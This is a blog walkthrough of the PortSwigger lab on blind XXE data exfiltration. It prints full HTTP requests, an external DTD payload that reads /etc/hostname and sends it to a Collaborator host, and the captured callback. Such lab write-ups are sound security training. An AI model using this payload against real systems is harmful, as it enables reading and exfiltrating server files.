Skip to content

chojnowski.it

Port Swigger Exploiting blind XXE to exfiltrate da

Port Swigger Exploiting blind XXE to exfiltrate da

Solution¶

Check stock for productId=1¶

POST /product/stock HTTP/2
Host: 0a73007603e3c7f38077e08500540056.web-security-academy.net
Cookie: session=SVlwrRuhahyQem3mgw4LBnSKVYa0raNl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a73007603e3c7f38077e08500540056.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a73007603e3c7f38077e08500540056.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Prepare payload¶

Open exploit server and preapre payload (first get a new subdomain from collaborator)
Subdomain: s92l53du6gvlrfzg1czqbpkvimodca0z.oastify.com
---
https://exploit-0aa200a0037fc72080e6dfd401f50064.exploit-server.net/exploit

Payload

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://s92l53du6gvlrfzg1czqbpkvimodca0z.oastify.com/?x=%file;'>">
%eval;
%exfil;

Edit request¶

Old request
POST /product/stock HTTP/2
Host: 0a73007603e3c7f38077e08500540056.web-security-academy.net
Cookie: session=SVlwrRuhahyQem3mgw4LBnSKVYa0raNl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a73007603e3c7f38077e08500540056.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a73007603e3c7f38077e08500540056.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
---
New request

POST /product/stock HTTP/2
Host: 0a73007603e3c7f38077e08500540056.web-security-academy.net
Cookie: session=SVlwrRuhahyQem3mgw4LBnSKVYa0raNl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a73007603e3c7f38077e08500540056.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 234
Origin: https://0a73007603e3c7f38077e08500540056.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa200a0037fc72080e6dfd401f50064.exploit-server.net/exploit"> %xxe;]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Read hostname on the tab Collaborator¶

Hostname: 803a85ba117c
---
GET /?x=803a85ba117c HTTP/1.1
User-Agent: Java/21.0.1
Host: s92l53du6gvlrfzg1czqbpkvimodca0z.oastify.com
Accept: */*
Connection: keep-alive

Solved¶